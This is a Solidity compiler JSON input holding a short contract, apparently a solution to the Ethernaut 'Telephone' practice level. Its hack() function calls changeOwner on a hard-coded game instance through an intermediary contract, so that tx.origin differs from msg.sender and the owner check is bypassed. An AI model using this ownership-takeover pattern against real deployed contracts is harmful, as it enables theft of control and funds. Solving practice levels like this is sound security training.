{
  "language": "Solidity",
  "sources": {
    "contracts/Ethernaut04.sol": {
      "content": "// SPDX-License-Identifier: MIT\n\npragma solidity ^0.8.17;\n\ninterface ITelephone {\n    function changeOwner(address _owner) external;\n}\n\ncontract Ethernaut04 {\n    function hack() public {\n        ITelephone(0x1ca9f1c518ec5681C2B7F97c7385C0164c3A22Fe).changeOwner(\n            msg.sender\n        );\n    }\n}\n"
    }
  },
  "settings": {
    "optimizer": {
      "enabled": false,
      "runs": 200
    },
    "outputSelection": {
      "*": {
        "*": [
          "abi",
          "evm.bytecode",
          "evm.deployedBytecode",
          "evm.methodIdentifiers",
          "metadata",
          "devdoc",
          "userdoc",
          "storageLayout",
          "evm.gasEstimates"
        ],
        "": [
          "ast"
        ]
      }
    },
    "metadata": {
      "useLiteralContent": true
    }
  }
}